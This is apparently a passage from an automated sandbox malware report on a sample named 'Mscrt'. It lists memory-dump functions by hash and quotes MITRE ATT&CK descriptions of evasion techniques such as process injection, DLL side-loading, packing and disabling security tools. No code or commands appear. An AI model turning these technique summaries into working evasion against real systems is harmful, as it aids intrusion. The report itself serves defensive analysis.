Opcode Fuzzy Hash: 3d076144661759f5442dacdff1209160a6b081c457103ae43ded047e21978836
Instruction Fuzzy Hash: A511483134964A4FEB18CF9894B47F83782DB90329F5506BAD94AC71E1D956E604C380

Function 00007FFD9BFE7E18 Relevance: .1, Instructions: 53COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.1876274387.00007FFD9BFE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BFE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_7ffd9bfe0000_Mscrt.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e33be32a58f3095cadef3c0c7c289cb355d8282819a4314f6216aaddc36ce858
Instruction ID: 00579655bd2e7786f8948b265a49614f5ab92bb7f4032f7c620ed7b8f6cff7ea
Opcode Fuzzy Hash: e33be32a58f3095cadef3c0c7c289cb355d8282819a4314f6216aaddc36ce858
Instruction Fuzzy Hash: 3F012711F4F19B86F6381EEC683157EE8409F80310F2607BAE40E861E5DE4F2A812392

Function 00007FFD9BC552B2 Relevance: .1, Instructions: 52COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.1862710384.00007FFD9BC50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_7ffd9bc50000_Mscrt.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ba9037a2b65ac649b7c2001ea5b44076e8a7e30805a8c2c6ed19f79351f38b98
Instruction ID: 731ac66e5dbdb5ce02ff0282a5a25373547d1d8757f15773df0699efd725e386
Opcode Fuzzy Hash: ba9037a2b65ac649b7c2001ea5b44076e8a7e30805a8c2c6ed19f79351f38b98
Instruction Fuzzy Hash: 12119530E1991EDFDBA8DB98D860AADB7B1FF58301F510079D01EE32A5DA75A9428B10

Function 00007FFD9B890C40 Relevance: .1, Instructions: 52COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.1851793075.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_7ffd9b890000_Mscrt.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: eee7e4384990795797137a788556d4f7706e55106158bf2520138550eb62e055
Instruction ID: c7f1da0299635a665fcfe16e6ac42aa22a955b14b1cfe40315717daf02bfd66f
Opcode Fuzzy Hash: eee7e4384990795797137a788556d4f7706e55106158bf2520138550eb62e055
Instruction Fuzzy Hash: 5E11A132F1E79D8FEB12DBA8886409C7FB0EF56714F0641F7D094DB2A2D93866498780

Function 00007FFD9B894815 Relevance: .0, Instructions: 50COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.1851793075.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_7ffd9b890000_Mscrt.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 41bc98b7075c9c715b87d35feef48d91a35063dc658d6dbef2b64d0756bdd847
Instruction ID: 700024c79487400a6fb3ac0e187f7baad2dfd9e09c72e7fb85ae2a0fbcb0ba04
Opcode Fuzzy Hash: 41bc98b7075c9c715b87d35feef48d91a35063dc658d6dbef2b64d0756bdd847
Instruction Fuzzy Hash: 15017121B1A91E8BEE78EBA484645B927D1EF58740F4740B9D44FD32B2DE28AD414740

Function 00007FFD9B890C48 Relevance: .0, Instructions: 46COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.1851793075.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_7ffd9b890000_Mscrt.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e292d237d62f4941218894ba5b3026688053f525485348b44732015021fa6a73
Instruction ID: de8073db095a90757edc78ea78f26c919281ede4ec07480aa335d68771e15b88
Opcode Fuzzy Hash: e292d237d62f4941218894ba5b3026688053f525485348b44732015021fa6a73
Instruction Fuzzy Hash: 76018031E1E38D9FEB16DBA4886409C7FB0EF56714F1641F7D054DB2A2D9386A858780

Function 00007FFD9BC511D1 Relevance: .0, Instructions: 43COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.1862710384.00007FFD9BC50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_7ffd9bc50000_Mscrt.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6ca31241abe3a89575926f65d00d64187ecc367178aaa1c02deb39985dc481f5
Instruction ID: 886c4f333686a90982a16c0c1ddc42efa2c759d2c71a159d6cb4fcd4c2678842
Opcode Fuzzy Hash: 6ca31241abe3a89575926f65d00d64187ecc367178aaa1c02deb39985dc481f5
Instruction Fuzzy Hash: E8F054218DF2D61FD71627B06C674E63F689F4322471B41F7E4488E4A3D44E179B8362

Function 00007FFD9B890C50 Relevance: .0, Instructions: 41COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.1851793075.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_7ffd9b890000_Mscrt.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 803161e7aa0492363a04f61e645ba7e9e3a49febbe1b9877362037f45d0a30d0
Instruction ID: 4742a825f2c0ea050981fb214c057a9507df2af765de659dce0da9e862045d11
Opcode Fuzzy Hash: 803161e7aa0492363a04f61e645ba7e9e3a49febbe1b9877362037f45d0a30d0
Instruction Fuzzy Hash: 39017131E1E38DDFEB26DBA4886409C7FB0EF16714F1541F7D054CB2A6D9386A848741

Function 00007FFD9BC56D8F Relevance: .0, Instructions: 40COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.1862710384.00007FFD9BC50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_7ffd9bc50000_Mscrt.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b0290f45a0db24d791b3a15b3e16bd33adb0a3957d31e58aad2cf4fb03186f2c
Instruction ID: 284910aaafe9f46e29ab67ff5b15385af364256d14f39431bb4a7c4b1bfe38f8
Opcode Fuzzy Hash: b0290f45a0db24d791b3a15b3e16bd33adb0a3957d31e58aad2cf4fb03186f2c
Instruction Fuzzy Hash: 01F02462B0DA4C4FEBA4D2E848183EC77D2EBA4354F01057AE00EE31A5CE956D054381

Function 00007FFD9BFE3C82 Relevance: .0, Instructions: 40COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.1876274387.00007FFD9BFE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BFE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_7ffd9bfe0000_Mscrt.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 477cbda589bb1e0e103790e9be4b4b3bf9af74aaff936fb5923e94169421c377
Instruction ID: 59cbc8ce9dd181e63249bffac12fa172a60d03d8ad4f2568e0cff25c6e23d687
Opcode Fuzzy Hash: 477cbda589bb1e0e103790e9be4b4b3bf9af74aaff936fb5923e94169421c377
Instruction Fuzzy Hash: 6FF04F3654E2C99FD7238FB098654E53FE4AF42210B1A01E6D0868A0A2C56E565AC762

Function 00007FFD9BFE4A08 Relevance: .0, Instructions: 40COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.1876274387.00007FFD9BFE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BFE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_7ffd9bfe0000_Mscrt.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5ba93b708a9bd2ef221338f29052e7ddc3d7b030c1d456f210d958f5dceab252
Instruction ID: 8787979286756a33640f65026ef45435cf9fc7fa7633635787aae72113bfb0ba
Opcode Fuzzy Hash: 5ba93b708a9bd2ef221338f29052e7ddc3d7b030c1d456f210d958f5dceab252
Instruction Fuzzy Hash: BB01813170A98E9BD7699F99806113CF3A2FF40B14761437DD01D8B692DF25BD118689

Function 00007FFD9B894914 Relevance: .0, Instructions: 39COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.1851793075.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_7ffd9b890000_Mscrt.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ca73bed036e3fd06a6eeed897d105eed0660ff90848b7c7d2a67942fa26a6a9a
Instruction ID: aac0572eab9672e3e9d09501151889c24c5da08cdcce9c192bbb9a455585968c
Opcode Fuzzy Hash: ca73bed036e3fd06a6eeed897d105eed0660ff90848b7c7d2a67942fa26a6a9a
Instruction Fuzzy Hash: 04011231E1942E8BEF74EB54C8647F87660FB19741F5641F9C44EE31A2DE686EC18A40

Function 00007FFD9BC560D2 Relevance: .0, Instructions: 38COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.1862710384.00007FFD9BC50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_7ffd9bc50000_Mscrt.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 140f889c2adc05c02ee142b17e3dc20b05e0408a50a508a1b581d16a6d7545b6
Instruction ID: ce675cd3f2659c94f69b89f8f49701ae2bab07f47be19eebe01c53e38d377ffc
Opcode Fuzzy Hash: 140f889c2adc05c02ee142b17e3dc20b05e0408a50a508a1b581d16a6d7545b6
Instruction Fuzzy Hash: 12F0963154E28A9FD712DBF088654EA7BB4EF42204B0500F6E45ACB0A2CA6D5646C761

Function 00007FFD9BC5C1BE Relevance: .0, Instructions: 35COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.1862710384.00007FFD9BC50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_7ffd9bc50000_Mscrt.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 54c496aeaef206076c734c1125b0d00c4c48802845d71fba216bd6f6375fb816
Instruction ID: 6877e74122ccf34ec5eb7ee518df9e2df029098b04d8f170f0d69d901452c4fd
Opcode Fuzzy Hash: 54c496aeaef206076c734c1125b0d00c4c48802845d71fba216bd6f6375fb816
Instruction Fuzzy Hash: 1EF09030B0CA484FD798EF6C886963977D2EB9830AB95057E904ED36B6CE60D9008341

Function 00007FFD9B8948AA Relevance: .0, Instructions: 34COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.1851793075.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_7ffd9b890000_Mscrt.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 246fc1f11f47f6d58c78bc73b9598349b1d014d14799fbbf3a30164269ce6247
Instruction ID: 201c59d5fa5a483d480b81654b3c277d649717f2ffd3d0e174cdc93cae7089c7
Opcode Fuzzy Hash: 246fc1f11f47f6d58c78bc73b9598349b1d014d14799fbbf3a30164269ce6247
Instruction Fuzzy Hash: F8F05421F1D42E8BEF74E754C4A46B97791EF49700F5601BDD88EE31B2CE186E814680

Function 00007FFD9B890B77 Relevance: .0, Instructions: 33COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.1851793075.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_7ffd9b890000_Mscrt.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cacf97983597faa3d360f01974805cb95aba7abcf6f28a7083999612b39f557e
Instruction ID: aa6a2dcb9ba2a1302334d00ac0b0bebe20a9e4f4a3b6a25c220668588a650059
Opcode Fuzzy Hash: cacf97983597faa3d360f01974805cb95aba7abcf6f28a7083999612b39f557e
Instruction Fuzzy Hash: A6F0553550A604CFC7409B38DCA54D0BFA0FB02209B4601AAC089C7562E310182CCB40

Function 00007FFD9B893E86 Relevance: .0, Instructions: 21COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.1851793075.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_7ffd9b890000_Mscrt.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0d0f5c55d3c883cb0a5ee599e21bd4ff24f57f5b766bc6a788ceaf8bff6f233d
Instruction ID: ba2590db9da98804a4a2e6f5daa82218f8719d3eae8b503c2ad6014c1635fa5f
Opcode Fuzzy Hash: 0d0f5c55d3c883cb0a5ee599e21bd4ff24f57f5b766bc6a788ceaf8bff6f233d
Instruction Fuzzy Hash: 50E01A21F2A11E4BFFA5A794C8647B96661EF98300F120074D90ED72E2DD286E418741

Function 00007FFD9BC5D8D7 Relevance: .0, Instructions: 18COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.1862710384.00007FFD9BC50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_7ffd9bc50000_Mscrt.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e4d1cd0f91ddef3a37203a2e4c6c8564f4d56123eaa74dd8a0d2cb138081ca2c
Instruction ID: b98df20aa4d86df0fdc7e2a350c4169e7521c78be50eba6c6e739a7532634b3c
Opcode Fuzzy Hash: e4d1cd0f91ddef3a37203a2e4c6c8564f4d56123eaa74dd8a0d2cb138081ca2c
Instruction Fuzzy Hash: E1E01251F1E3CB4BEB720EF8087547C2AA0AF0B341B5601B7D559892E3E9D82A059722

Function 00007FFD9BFEDA57 Relevance: .0, Instructions: 18COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.1876274387.00007FFD9BFE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BFE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_7ffd9bfe0000_Mscrt.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1d71ca002d3b7f43b94d3f061107784ed982694c7d79f300bf51221ec74d8ee3
Instruction ID: b6575b4ffc2949cdc58fc5966949b5fb2804f6033fa9a97e29b9f43598fc103e
Opcode Fuzzy Hash: 1d71ca002d3b7f43b94d3f061107784ed982694c7d79f300bf51221ec74d8ee3
Instruction Fuzzy Hash: F6E0C296B0E78A8FEB360AB408740B87A909F077C0B4602B6D0564A6F3C9992B048B21

Function 00007FFD9B8906A5 Relevance: .0, Instructions: 13COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.1851793075.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_7ffd9b890000_Mscrt.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 882e42c36d29679a7dfe2fac940d4aaabdc98051bb0c85b194df506ac0404ce2
Instruction ID: 2ccf4336559fe5796e3e26d4eacfafca5593c36d6ec295db3e1bd0179c7e1117
Opcode Fuzzy Hash: 882e42c36d29679a7dfe2fac940d4aaabdc98051bb0c85b194df506ac0404ce2
Instruction Fuzzy Hash: 21C04C06F6B61F51FC3673EE98660ADA9405FDDE20FD70173D54D800E19D4D22D54156

Function 00007FFD9B8912F0 Relevance: .0, Instructions: 12COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.1851793075.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_7ffd9b890000_Mscrt.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1bed8471f18df6f7d9483ff76289c08738482cfe5e60f3cdf0b43d534723fb55
Instruction ID: 23f4a1a7f76fdf68df82e825a4cc69e9db307044b16fb2bf5e386a616a214f1e
Opcode Fuzzy Hash: 1bed8471f18df6f7d9483ff76289c08738482cfe5e60f3cdf0b43d534723fb55
Instruction Fuzzy Hash: 63C08C3452180D8FC908EB28C88481437A0FB0D200BC20090E009C7170E229DCC2C780

Function 00007FFD9B890B18 Relevance: .0, Instructions: 12COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.1851793075.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_7ffd9b890000_Mscrt.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 57f70d88e5b2174ef0906753d9276444bdac17c23c3b83889dabecf84ab63d32
Instruction ID: 18c38d7a039808c826230c0bbaa54408dbd9be7cd0fd675ff49d32855d4fd25d
Opcode Fuzzy Hash: 57f70d88e5b2174ef0906753d9276444bdac17c23c3b83889dabecf84ab63d32
Instruction Fuzzy Hash: C9C04C305258098FC958EB6DC98595476E0FB0E215BD60190E40EC7171E65A9D95C749

Function 00007FFD9BC5E3AB Relevance: .0, Instructions: 11COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.1862710384.00007FFD9BC50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_7ffd9bc50000_Mscrt.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0d2bb4382c4da661e6309c114db0c8f0c1878a623e9d25475861faf0fe35697b
Instruction ID: da76e7beb9b9e29c1bd7cd70ba975ac19460936d44e0cc6a92555e065e4b2702
Opcode Fuzzy Hash: 0d2bb4382c4da661e6309c114db0c8f0c1878a623e9d25475861faf0fe35697b
Instruction Fuzzy Hash: 05D0CA30B4F60F86F6385AF1817023E66A59F20300FA2103EE19F419E5CE9CBB017212

Function 00007FFD9BC578BB Relevance: .0, Instructions: 11COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.1862710384.00007FFD9BC50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_7ffd9bc50000_Mscrt.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6f4638bde2b61fcefbbb0c6687629a8e9d07f94e331dabadf6f31afb86bdf19e
Instruction ID: 3dd780c4110da225d9d8cff391ec58a8be7af97998fb25027214dcdf5d385d97
Opcode Fuzzy Hash: 6f4638bde2b61fcefbbb0c6687629a8e9d07f94e331dabadf6f31afb86bdf19e
Instruction Fuzzy Hash: 00D0C910B0F51F85F13A46F1423027E21958F10301F63147FC45F559E1CD9C7781A321

Function 00007FFD9BFE547B Relevance: .0, Instructions: 11COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.1876274387.00007FFD9BFE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BFE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_7ffd9bfe0000_Mscrt.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 88aee399057a8ae294d7c21b75ba5aea158a791c35857b1981143dab32966a3c
Instruction ID: 1d5a000427fcdbce2ef536b66d1ac0d50b47018a749267bafe141915c03d1a3a
Opcode Fuzzy Hash: 88aee399057a8ae294d7c21b75ba5aea158a791c35857b1981143dab32966a3c
Instruction Fuzzy Hash: 54D0C910B1F54F85F6795EC1807223D22915F00302E23463DD05F458F2CE1F7B016221

Function 00007FFD9BFEE52B Relevance: .0, Instructions: 11COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.1876274387.00007FFD9BFE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BFE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_7ffd9bfe0000_Mscrt.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7230f68c0ed86ce50760161183ccfd4acb87f2b39e4a821ac2d4d912596c7e3c
Instruction ID: 1f007d7cb95c3d634cf7e060103323d03b6ac08f949ae4033605c0bc45ad1c51
Opcode Fuzzy Hash: 7230f68c0ed86ce50760161183ccfd4acb87f2b39e4a821ac2d4d912596c7e3c
Instruction Fuzzy Hash: E0D0C930B0F70F85F2B84EC1A07023E61928F01300E6A623DC0AF918F9DD1FB7096602

Function 00007FFD9B893566 Relevance: .0, Instructions: 10COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.1851793075.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_7ffd9b890000_Mscrt.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ac4710ff3cc5a3021c044975d69bf3d6e7e0e69c7ac98f4af724bd8262ce1e71
Instruction ID: 19e721711eb93a7a0d296a1a1df78f97577ccd8a288a096efe5abe1951b14f04
Opcode Fuzzy Hash: ac4710ff3cc5a3021c044975d69bf3d6e7e0e69c7ac98f4af724bd8262ce1e71
Instruction Fuzzy Hash: 2BC00200F1881A16E66A6658593157E04829B84658FD54074E42A962CADD1C5A025686

Function 00007FFD9BC56DDF Relevance: .0, Instructions: 8COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.1862710384.00007FFD9BC50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_7ffd9bc50000_Mscrt.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4ef55ce510aa60a4c7044e8f446600c48dcb3103826998ea4144fae83b2d77c6
Instruction ID: b4755d1d491f66d0853d6205f5d86c6578c244d45120c7ceadd36f8f3198c9b7
Opcode Fuzzy Hash: 4ef55ce510aa60a4c7044e8f446600c48dcb3103826998ea4144fae83b2d77c6
Instruction Fuzzy Hash: 5BC09280F0F38B6BEB3112F408B117C56800F16302B970B76F10A8A1E3EDCCBA05A321

Function 00007FFD9B8906C8 Relevance: .0, Instructions: 8COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.1851793075.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_7ffd9b890000_Mscrt.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 183926935db787c4c432a61b4ba3d14b1974444eef988ee6f68454cca7b70382
Instruction ID: 8701538d7720e156386b7bc2ac0dbbfc66b2c64de05f088dd57dffb96d5df861
Opcode Fuzzy Hash: 183926935db787c4c432a61b4ba3d14b1974444eef988ee6f68454cca7b70382
Instruction Fuzzy Hash: 5AB01200D6740F01EC2433FA08520A578405B4C510FC20170D80D80091984D12D40242

Function 00007FFD9BFE4993 Relevance: .0, Instructions: 6COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.1876274387.00007FFD9BFE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BFE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_7ffd9bfe0000_Mscrt.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 91adde5a74cd1c935fce39083b90a280d1e95c7cfd07e3944d1e1b43ef131098
Instruction ID: f9a65bf72834b2b9a96c9118118a01ef29af791e3ed10f96653d22e64c31a758
Opcode Fuzzy Hash: 91adde5a74cd1c935fce39083b90a280d1e95c7cfd07e3944d1e1b43ef131098
Instruction Fuzzy Hash: E6B00201F1E24B56E93558E519A517C10410B85245A561B3DA60E592E2ED5E2A407271

Description:	This technique has been deprecated. Please use Command and Scripting Interpreter where appropriate.
Tactics:	Defense Evasion, Execution
Data Sources:
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to execute malicious commands and payloads. WMI is an administration feature that provides a uniform environment to access Windows system components. The WMI service enables both local and remote access, though the latter is facilitated by Remote Services such as Distributed Component Object Model (DCOM) and Windows Remote Management (WinRM).Remote WMI over DCOM operates using port 135, whereas WMI over WinRM operates over port 5985 when using HTTP and 5986 for HTTPS.
Tactics:	Execution
Data Sources:	Command: Command Execution, Network Traffic: Network Connection Creation, Process: Process Creation, WMI: WMI Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	Module: Module Load, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. Most systems come with some built-in command-line interface and scripting capabilities, for example, macOS and Linux distributions include some flavor of Unix Shell while Windows installations include the Windows Command Shell and PowerShell .
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Network, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Driver: Driver Load, Process: Process Creation, Process: Process Termination, Sensor Health: Host Status, Service: Service Metadata, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Containers, IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

